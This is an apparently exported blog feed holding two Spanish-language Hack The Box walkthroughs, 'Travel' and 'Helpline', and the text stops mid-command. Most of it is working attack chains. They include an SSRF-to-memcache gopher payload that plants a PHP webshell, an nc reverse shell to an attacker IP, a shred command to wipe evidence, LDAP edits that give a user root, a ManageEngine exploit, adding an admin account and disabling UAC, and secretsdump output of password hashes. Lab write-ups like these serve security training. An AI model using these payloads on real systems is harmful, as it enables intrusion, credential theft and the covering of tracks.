Travel","description":"Travel","date":"2025-08-02T00:00:00.000Z","tags":["SubDomains","WordPress","Git","RSS","SSRF","Serialize","PHP","gopherus","RCE","Mysql","john","ldap"],"authors":["r4cc0x"],"url":"/blog/travel","content":"```zsh ping -c 3 10.10.10.189 PING 10.10.10.189 (10.10.10.189) 56(84) bytes of data. 64 bytes from 10.10.10.189: icmp_seq=1 ttl=63 time=62.1 ms 64 bytes from 10.10.10.189: icmp_seq=2 ttl=63 time=63.4 ms 64 bytes from 10.10.10.189: icmp_seq=3 ttl=63 time=62.7 ms ``` ## Recon ```zsh nmap -sCV -p 22,80,443 10.10.10.189 -oN targeted PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 d3:9f:31:95:7e:5e:11:45:a2:b4:b6:34:c0:2d:2d:bc (RSA) | 256 ef:3f:44:21:46:8d:eb:6c:39:9c:78:4f:50:b3:f3:6b (ECDSA) |_ 256 3a:01:bc:f8:57:f5:27:a1:68:1d:6a:3d:4e:bc:21:1b (ED25519) 80/tcp open http nginx 1.17.6 |_http-title: Travel.HTB |_http-server-header: nginx/1.17.6 443/tcp open ssl/http nginx 1.17.6 |_ssl-date: TLS randomness does not represent time | ssl-cert: Subject: commonName=www.travel.htb/organizationName=Travel.HTB/countryName=UK | Subject Alternative Name: DNS:www.travel.htb, DNS:blog.travel.htb, DNS:blog-dev.travel.htb | Not valid before: 2020-04-23T19:24:29 |_Not valid after: 2030-04-21T19:24:29 |_http-server-header: nginx/1.17.6 |_http-title: 400 The plain HTTP request was sent to HTTPS port Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` DNS ```zsh echo \"10.10.10.189 travel.htb blog.travel.htb blog-dev.travel.htb www.travel.htb\" | sudo tee -a /etc/hosts ``` - Travel web ![image](image.png) - Subdomains https ![image](image-1.png) - Blog Travel (WordPress) ![image](image-2.png) - Blog Dev travel ![image](image-3.png) ```zsh wpscan --url http://blog.travel.htb enumerate u ``` ```bash [+] URL: http://blog.travel.htb/ [10.10.10.189] [+] Started: Wed Jul 30 22:07:15 2025 Interesting Finding(s): [+] Headers | Interesting Entries: | - Server: nginx/1.17.6 | - X-Powered-By: PHP/7.3.16 | Found By: Headers (Passive Detection) | Confidence: 100% [+] robots.txt found: http://blog.travel.htb/robots.txt | Interesting Entries: | - /wp-admin/ | - /wp-admin/admin-ajax.php | Found By: Robots Txt (Aggressive Detection) | Confidence: 100% [+] XML-RPC seems to be enabled: http://blog.travel.htb/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/ | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/ [+] WordPress readme found: http://blog.travel.htb/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] The external WP-Cron seems to be enabled: http://blog.travel.htb/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 5.4 identified (Insecure, released on 2020-03-31). | Found By: Rss Generator (Passive Detection) | - http://blog.travel.htb/feed/, https://wordpress.org/?v=5.4 | - http://blog.travel.htb/comments/feed/, https://wordpress.org/?v=5.4 [+] WordPress theme in use: twentytwenty | Location: http://blog.travel.htb/wp-content/themes/twentytwenty/ | Last Updated: 2025-04-15T00:00:00.000Z | Readme: http://blog.travel.htb/wp-content/themes/twentytwenty/readme.txt | [!] The version is out of date, the latest version is 2.9 | Style URL: http://blog.travel.htb/wp-content/themes/twentytwenty/style.css?ver=1.2 | Style Name: Twenty Twenty | Style URI: https://wordpress.org/themes/twentytwenty/ | Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Found By: Css Style In Homepage (Passive Detection) | Confirmed By: Css Style In 404 Page (Passive Detection) | | Version: 1.2 (80% confidence) | Found By: Style (Passive Detection) | - http://blog.travel.htb/wp-content/themes/twentytwenty/style.css?ver=1.2, Match: 'Version: 1.2' [+] Enumerating All Plugins (via Passive Methods) [i] No plugins Found. [+] Enumerating Config Backups (via Passive and Aggressive Methods) Checking Config Backups - Time: 00:00:02 (137 / 137) 100.00% Time: 00:00:02 [i] No Config Backups Found. ``` ```zsh or domain in travel.htb blog.travel.htb blog-dev.travel.htb; do nmap --script http-enum -p80 $domain -oN ${domain}_webScan; done ``` ### Git - blog.travel ```zsh PORT STATE SERVICE 80/tcp open http | http-enum: | /wp-login.php: Possible admin folder | /wp-json: Possible admin folder | /robots.txt: Robots file | /readme.html: Wordpress version: 2 | /: WordPress version: 5.4 | /feed/: Wordpress version: 5.4 | /wp-includes/images/rss.png: Wordpress version 2.2 found. | /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found. | /wp-includes/images/blank.gif: Wordpress version 2.6 found. | /wp-includes/js/comment-reply.js: Wordpress version 2.7 found. | /wp-login.php: Wordpress login page. | /wp-admin/upgrade.php: Wordpress login page. | /readme.html: Interesting, a readme. |_ /0/: Potentially interesting folder ``` - blog-dev.travel.htb ```zsh # Nmap 7.95 scan initiated Wed Jul 30 22:10:31 2025 as: /usr/lib/nmap/nmap --privileged --script http-enum -p80 -oN blog-dev.travel.htb_webScan blog-dev.travel.htb Nmap scan report for blog-dev.travel.htb (10.10.10.189) Host is up (0.063s latency). rDNS record for 10.10.10.189: travel.htb PORT STATE SERVICE 80/tcp open http | http-enum: |_ /.git/HEAD: Git folder ``` https://github.com/arthaud/git-dumper ```zsh python3 git_dumper.py http://blog-dev.travel.htb/.git/ travel ``` Si revisamos primero el log de git podemos ver un usuario `jane` ![image](image-4.png) ### RSS Tenemos 3 archivos de los cuales el rss_template.php tiene al final un apartado en el codigo interesante: ```php --> ``` Finalmente, si `$_GET['debug']`se establece, `debug.php`se incluye. Esto usa SimplePie, un plugin para WordPress diseñado para analizar feeds XML en objetos PHP. Descubrí su `memcache`uso y revisé la documentación de SimplePie. Resulta que los objetos PHP que representan los feeds XML se almacenan en caché durante un breve periodo. La funcionalidad `debug.php` fue un poco más difícil de encontrar. Finalmente descubrí que al visitar http://blog.travel.htb/awesome-rss/, debug.php mostraba una salida. Tras volver a comprobar el código RSS, descubrí que era una lista de pares clave-valor almacenados en Memcache. ![image](image-5.png) ``` view-source:http://blog.travel.htb/wp-content/themes/twentytwenty/debug.php ``` La clave `xct_4e5612ba{...}` es el prefijo con un hash añadido; sin embargo, el hash completo no es visible. - rss_template.php ```php set_cache_location('memcache://127.0.0.1:11211/?timeout=60&prefix=xct_'); //$simplepie->set_raw_data($data); $simplepie->set_feed_url($url); $simplepie->init(); $simplepie->handle_content_type(); if ($simplepie->error) { error_log($simplepie->error); $simplepie = null; $failed = True; } } else { $failed = True; } return $simplepie; } $url = $_SERVER['QUERY_STRING']; if(strpos($url, \"custom_feed_url\") !== false){ $tmp = (explode(\"=\", $url)); $url = end($tmp); } else { $url = \"http://www.travel.htb/newsfeed/customfeed.xml\"; } $feed = get_feed($url); if ($feed->error()) { echo ' ' . \"\\r\\n\"; echo ' ' . htmlspecialchars($feed->error()) . \" \\r\\n\"; echo ' ' . \"\\r\\n\"; } else { ?> get_link(); $title = $feed->get_title(); if ($link) { $title = \" $title \"; } echo $title; ?> get_description(); ?> get_items() as $item): ?> get_permalink()) echo ' get_permalink() . '\">'; echo $item->get_title(); if ($item->get_permalink()) echo ' '; ?>&nbsp; get_date('j M Y, g:i a'); ?> get_content(); ?> get_enclosure(0)) { echo ' '; echo ' ' . $enclosure->embed(array( 'audio' => './for_the_demo/place_audio.png', 'video' => './for_the_demo/place_video.png', 'mediaplayer' => './for_the_demo/mediaplayer.swf', 'altclass' => 'download' )) . ' '; if ($enclosure->get_link() && $enclosure->get_type()) { echo ' (' . $enclosure->get_type(); if ($enclosure->get_size()) { echo '; ' . $enclosure->get_size() . ' MB'; } echo ') '; } if ($enclosure->get_thumbnail()) { echo ' get_thumbnail() . '\" alt=\"\" /> '; } echo ' '; } ?> --> Hacking attempt prevented (LFI). Event has been logged. \"); } if(strpos($tmpUrl, \"-o\") !== false or strpos($tmpUrl, \"-F\") !== false) { die(\" Hacking attempt prevented (Command Injection). Event has been logged. \"); } $tmp = parse_url($url, PHP_URL_HOST); // preventing all localhost access if($tmp == \"localhost\" or $tmp == \"127.0.0.1\") { die(\" Hacking attempt prevented (Internal SSRF). Event has been logged. \"); } return $url; } function url_get_contents ($url) { $url = safe($url); $url = escapeshellarg($url); $pl = \"curl \".$url; $output = shell_exec($pl); return $output; } class TemplateHelper { private $file; private $data; public function __construct(string $file, string $data) { $this->init($file, $data); } public function __wakeup() { $this->init($this->file, $this->data); } private function init(string $file, string $data) { $this->file = $file; $this->data = $data; file_put_contents(__DIR__.'/logs/'.$this->file, $this->data); } } ``` Esto implementa una `url_get_contents`función (utilizada por `rss_template.php`) que, tras realizar comprobaciones de seguridad y el escape de argumentos, pasa una URL a curl y devuelve el resultado. Con esto, podemos realizar falsificaciones de solicitudes del lado del servidor. También existe una clase TemplateHelper que, mediante el método mágico `__wakeup`(deserialización), escribirá datos arbitrarios en un archivo arbitrario. Obtiene la URL del feed desde el parámetro `custom_feed_url` en la cadena de consulta sin validación. ![image](image-6.png) - Inyeccion ```zsh http://blog.travel.htb/awesome-rss/?custom_feed_url=http://10.10.14.5/custom.xml ``` ![image](image-7.png) Vemos que hay una via potencial pero aun no podemos hacer nada, simplemente entender la logica detras del codigo. ![image](image-8.png) ## php-serialize + ssrf + phpmemcache Encontramos la forma en la que obtiene el hash para el serializado: https://simplepie.org/api/source-class-SimplePie.html ```php { $cache = $this->registry->call('Cache', 'create', array($this->cache_location, call_user_func($this->cache_name_function, $this->feed_url), 'spc')); ``` ```php php > echo md5(\"http://www.travel.htb/newsfeed/customfeed.xml\"); 3903a76d1e6fef0d76e973a0561cbfc0 ``` El problema aqui es que el output no es similar al md5 que obtenemos en debug, quiza hay alguna funcion que se estra agregando https://github.com/WordPress/WordPress/blob/master/wp-includes/SimplePie/src/Cache/Memcache.php ```php $this->name = $this->options['extras']['prefix'] . md5(\"$name:$type\"); ``` En esta forma obtenemos el md5 correctamente ```php echo md5(md5(\"http://www.travel.htb/newsfeed/customfeed.xml\") . \":spc\"); 4e5612ba079c530a6b1f148c0b352241 ``` ```php xct_4e5612ba079c530a6b1f148c0b352241 ``` https://notsosecure.com/remote-code-execution-php-unserialize https://github.com/tarunkant/Gopherus ![image](image-9.png) ```zsh ./gopherus.py --exploit phpmemcache ``` ![image](image-10.png) ```python >>> hex(127) '0x7f' >>> hex(0) '0x0' >>> hex(0) '0x0' >>> hex(1) '0x1' ``` ```zsh http://blog.travel.htb/awesome-rss/?custom_feed_url=gopher://0x7f000001:11211/_%0D%0Aset%20SpyD3r%204%200%203%0D%0AOLA%0D%0A ``` ![image](image-11.png) tomaremos como ejemplo el archivo template.php ```php init($file, $data); } public function __wakeup() { $this->init($this->file, $this->data); } private function init(string $file, string $data) { $this->file = $file; $this->data = $data; file_put_contents(__DIR__.'/logs/'.$this->file, $this->data); } } $exploit = new TemplateHelper(\"pwned.php\", \" \"); echo serialize($exploit); ?> ``` - PoC Si ejecutamos el codigo php malicioso `php pwnFeed.php` nos generara un archivo que contendra una webshell en logs ![image](image-12.png) A su vez nos compartira el conenido que ejecutamos serializado ```zsh php pwnFeed.php; echo O:14:\"TemplateHelper\":2:{s:4:\"file\";s:9:\"pwned.php\";s:4:\"data\";s:31:\" \";} ``` ```zsh O:14:\"TemplateHelper\":2:{s:20:\"TemplateHelperfile\";s:9:\"pwned.php\";s:20:\"TemplateHelperdata\";s:34:\" \";} ``` --- En estos pasos puedes tener algún problema ya que la serialización PHP es muy estricta con los formatos. Aqui ocurren errores en el formato ```php http://blog.travel.htb/awesome-rss/?custom_feed_url=gopher://0x7f000001:11211/_%0d%0aset%20SpyD3r%204%200%20109%0d%0aO:14:%22TemplateHelper%22:2:%7Bs:20:%22file%22%3Bs:9:%22pwned.php%22%3Bs:20:%22data%22%3Bs:34:%22%3C%3Fphp%20system%28%24_REQUEST%5B%27cmd%27%5D%29%3B%20%3F%3E%22%3B%7D%20%0d%0a ``` ![image](image-13.png) Ahora remplazaremos SpyD3r por xct_{md5...} ```php http://blog.travel.htb/awesome-rss/?debug=yes&custom_feed_url=gopher://127.00.0.1:11211/_%0d%0aset%20xct_4e5612ba079c530a6b1f148c0b352241%204%200%20108%0d%0aO:14:%22TemplateHelper%22:2:%7Bs:4:%22file%22%3Bs:13:%22pwndshell.php%22%3Bs:4:%22data%22%3Bs:31:%22%3C%3Fphp%20system%28%24_REQUEST%5B%22cmd%22%5D%29%3B%22%3B%7D%0d%0a ``` #### RCE ```zsh http://blog.travel.htb/wp-content/themes/twentytwenty/logs/pwndshell.php?cmd=which%20nc ``` ```zsh http://blog.travel.htb/wp-content/themes/twentytwenty/logs/pwndshell.php?cmd=nc -e /bin/bash 10.10.14.5 4444 ``` #### Container ```zsh ip a 1: lo: mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever 16: eth0@if17: mtu 1500 qdisc noqueue state UP group default link/ether 02:42:ac:1e:00:0a brd ff:ff:ff:ff:ff:ff link-netnsid 0 inet 172.30.0.10/24 brd 172.30.0.255 scope global eth0 valid_lft forever preferred_lft forever ``` Eliminamos evidencia del archivo ```zsh shred -zun 5 -v pwned.php ``` ```zsh cat /etc/os-release ``` ```zsh PRETTY_NAME=\"Debian GNU/Linux 10 (buster)\" NAME=\"Debian GNU/Linux\" VERSION_ID=\"10\" VERSION=\"10 (buster)\" VERSION_CODENAME=buster ID=debian HOME_URL=\"https://www.debian.org/\" SUPPORT_URL=\"https://www.debian.org/support\" BUG_REPORT_URL=\"https://bugs.debian.org/\" ``` - wp-config.php ```mysql 'DB_NAME', 'wp' 'DB_USER', 'wp' 'DB_PASSWORD', 'fiFtDDV9LYe8Ti' ``` ### Mysql > El puerto por defecto de MySQL/MariaDB es (3306) ```zsh mysql -mysql -uwp -p ``` ![image](image-14.png) ```zsh admin $P$BIRXVj/ZG0YRiBH8gnRy0chBx67WuK/ ``` Con john no se pudo romper quiza haya que seguir enumerando para conseguir algo con que o como romper. - OPT Directory ```bash www-data@blog:/opt/wordpress$ ls backup-13-04-2020.sql www-data@blog:/opt/wordpress$ ``` si abrimos el archivo sql podemos ver al final que vemos otro usuario, ``lynik-admin`` y su hash que intentaremos nuevamente con john si podemos romperla. ![image](image-15.png) ```zsh john pass -w=/usr/share/wordlists/rockyou.txt ``` ```zsh Using default input encoding: UTF-8 Loaded 1 password hash (phpass [phpass ($P$ or $H$) 128/128 AVX 4x3]) Cost 1 (iteration count) is 8192 for all loaded hashes Will run 6 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status 1stepcloser (?) 1g 0:00:00:17 DONE (2025-08-02 00:43) 0.05630g/s 41140p/s 41140c/s 41140C/s 1stward..1mireya Use the \"--show --format=phpass\" options to display all of the cracked passwords reliably Session completed. ``` Probamos conectarnos con ssh, ya que este usuario no existe en el contenedor, ```zsh ssh lynik-admin@10.10.10.189 lynik-admin@10.10.10.189's password: Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-26-generic x86_64) System information as of Sat 02 Aug 2025 04:51:01 AM UTC System load: 0.13 Usage of /: 46.0% of 15.68GB Memory usage: 14% Swap usage: 0% Processes: 201 Users logged in: 0 IPv4 address for br-836575a2ebbb: 172.20.0.1 IPv4 address for br-8ec6dcae5ba1: 172.30.0.1 IPv4 address for docker0: 172.17.0.1 IPv4 address for eth0: 10.10.10.189 lynik-admin@travel:~$ ``` - Enumeration ``` ls /home lynik-admin trvl-admin ``` ```zsh ls -la total 36 drwx------ 3 lynik-admin lynik-admin 4096 Apr 24 2020 . drwxr-xr-x 4 root root 4096 Apr 23 2020 .. lrwxrwxrwx 1 lynik-admin lynik-admin 9 Apr 23 2020 .bash_history -> /dev/null -rw-r--r-- 1 lynik-admin lynik-admin 220 Feb 25 2020 .bash_logout -rw-r--r-- 1 lynik-admin lynik-admin 3771 Feb 25 2020 .bashrc drwx------ 2 lynik-admin lynik-admin 4096 Apr 23 2020 .cache -rw-r--r-- 1 lynik-admin lynik-admin 82 Apr 23 2020 .ldaprc -rw-r--r-- 1 lynik-admin lynik-admin 807 Feb 25 2020 .profile -r--r--r-- 1 root root 33 Aug 1 22:03 user.txt -rw------- 1 lynik-admin lynik-admin 861 Apr 23 2020 .viminfo lynik-admin@travel:~$ cat .ldaprc HOST ldap.travel.htb BASE dc=travel,dc=htb BINDDN cn=lynik-admin,dc=travel,dc=htb lynik-admin@travel:~$ ``` - .viminfo ```zsh # Registers: \"\"1 LINE 0 BINDPW Theroadlesstraveled |3,1,1,1,1,0,1587670528,\"BINDPW Theroadlesstraveled\" ``` ## LDAP ```zsh apropos ldap ldap.conf (5) - LDAP configuration file/environment variables ldapadd (1) - LDAP modify entry and LDAP add entry tools ldapcompare (1) - LDAP compare tool ldapdelete (1) - LDAP delete entry tool ldapexop (1) - issue LDAP extended operations ldapmodify (1) - LDAP modify entry and LDAP add entry tools ldapmodrdn (1) - LDAP rename entry tool ldappasswd (1) - change the password of an LDAP entry ldapsearch (1) - LDAP search tool ldapurl (1) - LDAP URL formatting tool ldapwhoami (1) - LDAP who am i? tool ldif (5) - LDAP Data Interchange Format sssd-ldap (5) - SSSD LDAP provider sssd-ldap-attributes (5) - SSSD LDAP Provider: Mapping Attributes ``` ```zsh ldapsearch -x -w Theroadlesstraveled ``` ```zsh # LDAPv3 # base (default) with scope subtree # filter: (objectclass=*) # requesting: ALL # # travel.htb dn: dc=travel,dc=htb objectClass: top objectClass: dcObject objectClass: organization o: Travel.HTB dc: travel # admin, travel.htb dn: cn=admin,dc=travel,dc=htb objectClass: simpleSecurityObject objectClass: organizationalRole cn: admin description: LDAP administrator # servers, travel.htb dn: ou=servers,dc=travel,dc=htb description: Servers objectClass: organizationalUnit ou: servers # lynik-admin, travel.htb dn: cn=lynik-admin,dc=travel,dc=htb description: LDAP administrator objectClass: simpleSecurityObject objectClass: organizationalRole cn: lynik-admin userPassword:: e1NTSEF9MEpaelF3blZJNEZrcXRUa3pRWUxVY3ZkN1NwRjFRYkRjVFJta3c9PQ= = ``` En esta lista aparecen varios usuarios, creare una lista ```d jane frank brian jerry edward lynik eugene gloria johnny louise christopher ``` [SUDO](https://www.sudo.ws/docs/man/1.8.16/sudoers.ldap.man/) [# How To Use LDIF Files to Make Changes to an OpenLDAP System](https://www.digitalocean.com/community/tutorials/how-to-use-ldif-files-to-make-changes-to-an-openldap-system) ```zsh ssh-keygen -t ed25519 -C \"jerry@kali\" ``` En lynik-admin creamos el archivo siguiente: `cat pwn.ldif` ```zsh dn: uid=jerry,ou=users,ou=linux,ou=servers,dc=travel,dc=htb changetype: modify replace: homeDirectory homeDirectory: /root - add: objectClass objectClass: ldapPublicKey - add: sshPublicKey sshPublicKey: ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHg13eMgcFZIOtDehZPZSj4JlLEgV4gBDJyh+448r/Zq jerry@kali - replace: userPassword userPassword: Pwn3d - replace: gidNumber gidNumber: 27 ``` ```zsh ldapmodify -D \"cn=lynik-admin,dc=travel,dc=htb\" -w Theroadlesstraveled -f pwn.ldif ``` ![image](image-16.png) ```zsh ssh -i key-cred jerry@travel.htb sudo su - Pwn3d ``` ![image](image-17.png)"},{"id":"helpline","title":"HTB - Helpline","description":"Helpline","date":"2025-07-30T00:00:00.000Z","tags":["ManageEngine","CVE-2021-44077","XSS","RCE","UAC","SecretsDump","RDP","magnify","Powershell","cipher","winlogon"],"authors":["r4cc0x"],"url":"/blog/helpline","content":"```zsh ping -c 3 10.10.10.132 PING 10.10.10.132 (10.10.10.132) 56(84) bytes of data. 64 bytes from 10.10.10.132: icmp_seq=1 ttl=127 time=201 ms 64 bytes from 10.10.10.132: icmp_seq=2 ttl=127 time=133 ms 64 bytes from 10.10.10.132: icmp_seq=3 ttl=127 time=133 ms ``` `TTL= 127 = Maquina Windows` ## Recon ```zsh nmap -sCV -p 135,445,8080,49667 10.10.10.132 -oN targeted ``` ```zsh # Nmap 7.95 scan initiated Mon Jul 28 20:21:35 2025 as: /usr/lib/nmap/nmap --privileged -sCV -p 135,445,8080,49667 -oN targeted 10.10.10.132 Nmap scan report for 10.10.10.132 Host is up (0.13s latency). PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 445/tcp open microsoft-ds? 8080/tcp open http-proxy - |_http-title: ManageEngine ServiceDesk Plus |_http-server-header: - | fingerprint-strings: | GetRequest: | HTTP/1.1 200 OK | Set-Cookie: JSESSIONID=3D4775CC5DBE6BAF221E65F4C3FEA826; Path=/; HttpOnly | Cache-Control: private | Expires: Thu, 01 Jan 1970 01:00:00 GMT | Content-Type: text/html;charset=UTF-8 | Vary: Accept-Encoding | Date: Tue, 29 Jul 2025 00:21:44 GMT | Connection: close | Server: - | | | | | | | | | | | HTTPOptions: | HTTP/1.1 200 OK | Set-Cookie: JSESSIONID=421AA7B4E3E85147CFABEE35F433C011; Path=/; HttpOnly | Cache-Control: private | Expires: Thu, 01 Jan 1970 01:00:00 GMT | Content-Type: text/html;charset=UTF-8 | Vary: Accept-Encoding | Date: Tue, 29 Jul 2025 00:21:46 GMT | Connection: close | Server: - | | | | | | | | | |_ 49667/tcp open msrpc Microsoft Windows RPC 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port8080-TCP:V=7.95%I=7%D=7/28%Time=68881418%P=x86_64-pc-linux-gnu%r(Ge SF:tRequest,25D6,\"HTTP/1\\.1\\x20200\\x20OK\\r\\nSet-Cookie:\\x20JSESSIONID=3D47 SF:75CC5DBE6BAF221E65F4C3FEA826;\\x20Path=/;\\x20HttpOnly\\r\\nCache-Control:\\ SF:x20private\\r\\nExpires:\\x20Thu,\\x2001\\x20Jan\\x201970\\x2001:00:00\\x20GMT\\ SF:r\\nContent-Type:\\x20text/html;charset=UTF-8\\r\\nVary:\\x20Accept-Encoding SF:\\r\\nDate:\\x20Tue,\\x2029\\x20Jul\\x202025\\x2000:21:44\\x20GMT\\r\\nConnection SF::\\x20close\\r\\nServer:\\x20-\\r\\n\\r\\n \\n \\n \\n \\n\\n\\n\\n\\ SF:r\\n\\n\\x20\\x20\\x20\\x20 \\n\\x20\\x20\\x20\\x2 SF:0 \\n\\x20\\x20\\x20\\x20\\n\\x20\\x20\\ SF:x20\\x20 \\n\\x20\\x20\\x20\\x20 \\n\\x20 SF:\\x20\\x20\\x20 \\n\\x20\\x20\\x20\\x20 \")%r(HTTPOptions,25D6,\"HTTP/1\\.1\\x20200\\x20OK\\r\\nSet-Cookie:\\x20JSE SF:SSIONID=421AA7B4E3E85147CFABEE35F433C011;\\x20Path=/;\\x20HttpOnly\\r\\nCac SF:he-Control:\\x20private\\r\\nExpires:\\x20Thu,\\x2001\\x20Jan\\x201970\\x2001:0 SF:0:00\\x20GMT\\r\\nContent-Type:\\x20text/html;charset=UTF-8\\r\\nVary:\\x20Acc SF:ept-Encoding\\r\\nDate:\\x20Tue,\\x2029\\x20Jul\\x202025\\x2000:21:46\\x20GMT\\r SF:\\nConnection:\\x20close\\r\\nServer:\\x20-\\r\\n\\r\\n \\n \\n \\n \\n\\n\\n\\n\\r\\n\\n\\x20\\x20\\x20\\x20 \\n\\x2 SF:0\\x20\\x20\\x20 \\n\\x20\\x20\\x20\\x2 SF:0\\n\\x20\\x20\\x20\\x20 \\n\\x20\\x20\\x20\\x20 \\n\\x20\\x20\\x20\\x20 \\n\\x20\\x20\\x20\\x20 \"); Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2025-07-29T00:23:24 |_ start_date: N/A | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Mon Jul 28 20:24:02 2025 -- 1 IP address (1 host up) scanned in 146.53 seconds ``` ## Enumeration ![image](image.png) ``` administrator/administrator ``` ![image](image-3.png) ``` guest/guest ``` ![image](image-1.png) ## Administrator Despues de estar minutos buscando alguna vulnerabilidad ![image](image-2.png) ### CVE-2021-44077 https://www.exploit-db.com/exploits/46659 ```zsh python3 exploit.py ``` ```dtd Url: http://10.10.10.132:8080 User with low priv: guest:guest User to bypass authentication to: administrator Getting a session id Sessid: 91F37CCD796406B6BE141BD20AD9219F Logging in with low privilege user Captured authenticated cookies. 29F66DA431869841E1E70D9EB4EE4BD6 ED7CDD04106A671E511D51B4BA926BA3 Captured secondary sessid. 317017D200BBDF765FBE791998CD1083 Doing the magic step 1. Doing the magic step 2. Captured target session.Set following cookies on your browser. JSESSIONID=B7E0A511C8D49C6B9684CFD08AC46B74 JSESSIONIDSSO=76588A444801ED5EDE1AF4B6AF37D7CA febbc30d=5de808552f224573a8b3087cb580ed50 mesdpc9c14c513d=392769731532db01e9ffd0a2b12a0be398e574ff _rem=true ``` ![image](image-4.png) Es vulnerable a XSS tambien ```zsh /SolutionSearch.do?searchText=1'%3balert('XSS')%2f%2f706z8rz68&selectName=Solutions ``` ![image](image-5.png) ## Remote Code Execution ```zsh chmod +x nc.exe impacket-smbserver racc0x $(pwd) -smb2support ``` ``` Admin -> Custom Triggers -> New Action ``` ![image](image-6.png) ``` Request -> new Incident ``` ![image](image-7.png) - Reverse Shell ![image](image-8.png) ![image](image-9.png) ```powershell c:\\Users\\tolu\\Desktop>whoami whoami nt authority\\system ``` Para cambiar al disco C: solo tecleamos C: y cambiara al disco. ```powershell C: ``` ```powershell c:\\Users\\tolu\\Desktop>type user.txt type user.txt Access is denied. ``` ? ```powershell cipher /c user.txt Listing c:\\Users\\tolu\\Desktop\\ New files added to this directory will not be encrypted. E user.txt Compatibility Level: Windows XP/Server 2003 Users who can decrypt: HELPLINE\\tolu [tolu(tolu@HELPLINE)] Certificate thumbprint: 91EF 5D08 D1F7 C60A A0E4 CEE7 3E05 0639 A669 2F29 No recovery certificate found. Key information cannot be retrieved. The specified file could not be decrypted. ``` ``` net user drei drei23 /add net localgroup administrators drei /add ``` UAC Disable: ``` reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f ``` ``` Set-NetFirewallRule -Name RemoteDesktop-UserMode-In-TCP -Enabled true Set-ItemProperty -Path 'HKLM:\\\\System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp' -name \"UserAuthentication\" -Value 1 Set-ItemProperty -Path 'HKLM:\\\\System\\\\CurrentControlSet\\\\Control\\\\Terminal Server'-name \"fDenyTSConnections\" -Value 0 ``` ## SecretsDump ```zsh impacket-secretsdump drei:drei23@10.10.10.132 ``` ```zsh Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [*] Service RemoteRegistry is in stopped state [*] Starting service RemoteRegistry [*] Target system bootKey: 0xf684313986dcdab719c2950661809893 [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:d5312b245d641b3fae0d07493a022622::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:52a344a6229f7bfa074d3052023f0b41::: alice:1000:aad3b435b51404eeaad3b435b51404ee:998a9de69e883618e987080249d20253::: zachary:1007:aad3b435b51404eeaad3b435b51404ee:eef285f4c800bcd1ae1e84c371eeb282::: leo:1009:aad3b435b51404eeaad3b435b51404ee:60b05a66232e2eb067b973c889b615dd::: niels:1010:aad3b435b51404eeaad3b435b51404ee:35a9de42e66dcdd5d512a796d03aef50::: tolu:1011:aad3b435b51404eeaad3b435b51404ee:03e2ec7aa7e82e479be07ecd34f1603b::: drei:1012:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: edrei:1013:aad3b435b51404eeaad3b435b51404ee:23130388e561f545ee64174722a27e05::: [*] Dumping cached domain logon information (domain/username:hash) [*] Dumping LSA Secrets [*] DefaultPassword leo:fe22ca6029a87b98e527686a56c12aa9 [*] DPAPI_SYSTEM dpapi_machinekey:0xac6ecf4487d6451ab055dde974cd04dd2ae8463c dpapi_userkey:0x2d28120da695e819700547fa7329d71dc8e9b546 [*] NL$KM 0000 E3 05 BC AB 6F AC 32 0E 38 53 9A 46 3E A8 2B 90 ....o.2.8S.F>.+. 0010 3E 1E A1 C3 94 65 8D 5D 5A 2A 6D F5 FC C4 93 49 >....e.]Z*m....I 0020 CE 68 24 DF 38 F0 A6 3D E1 60 73 E2 B1 CE 1A CC .h$.8..=.`s..... 0030 43 DB 81 EE C8 34 DE 2E 98 4E 5C D3 35 3F 4A D4 C....4...N\\.5?J. NL$KM:e305bcab6fac320e38539a463ea82b903e1ea1c394658d5d5a2a6df5fcc49349ce6824df38f0a63de16073e2b1ce1acc43db81eec834de2e984e5cd3353f4ad4 [*] Cleaning up... [*] Stopping service RemoteRegistry ``` ```zsh impacket-psexec 